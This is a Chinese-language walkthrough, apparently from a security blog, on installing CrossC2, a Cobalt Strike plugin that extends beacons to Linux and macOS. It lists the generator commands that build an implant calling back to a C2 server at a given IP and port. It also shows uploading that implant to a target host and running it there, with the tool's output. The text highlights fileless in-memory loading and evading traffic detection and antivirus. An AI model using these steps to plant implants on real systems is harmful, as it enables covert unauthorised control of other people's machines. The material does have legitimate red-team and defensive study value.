0x01 前言
Cross C2是一個支持Linux & MacOS系統的拓展插件,支持用戶自定義生成的動態庫,以無文件落地的方式從內存中加載執行動態庫或可執行文件。用法我的想法來說,相當於一個小集群,插件化方便利用,實際的滲透中意義並不大,更加實際於命令行滲透,做到無文件落地,過流量檢測加密免殺等技術的研究。
簡而言之:一個CS的簡單小插件,目的就是上線Linux主機, 可做一些簡單的操作,記錄一下使用過程中遇到的一些問題,並且在使用中操作的正確性。
Cross c2支持架構說明:
0x02 CrossC2下載安裝
下載地址 https://github.com/gloxec/CrossC2/releases
windows版本 linux 版本 mac版本
客戶端生成的話記得復制 運行在服務器端程序根目錄的 .cobaltstrike.beacon_keys 文件到客戶端 生成上線木馬
genCrossC2.Win.exe 192.168.100.111 443 null null Linux x64 C2
0x03 生成可執行文件並上線Linux
[usage]: ./genCrossC2.Linux [host] [port] [getURI] [postURI] [platform] [arch] [outputFileName] -platform 'MacOS' / 'Linux' -arch 'x86' / 'x64'
[ex]: ./genCrossC2.Linux 127.0.0.1 443 null null Linux x64 C2
CrossC2.cna 文件在source code里面 下載了安裝到客戶端腳本管理器
上傳被控端 chmod 755 ./C2 && ./C2D:\temp\genCrossC2.Win>genCrossC2.Win.exe 127.0.0.1 8443 null null Linux x64
./C2
___ ___ ____
/ __\ __ ___ ___ ___ / __\___ \
/ / | '__/ _ \/ __/ __| / / __) |
/ /__| | | (_) \__ \__ \ / /___ / __/__
\____/_| \___/|___/___/ \____/|_______|
CrossC2 v2.2.1#stable @hook
{cs >= 4.1}
*[success] : Packed 1825240 byte.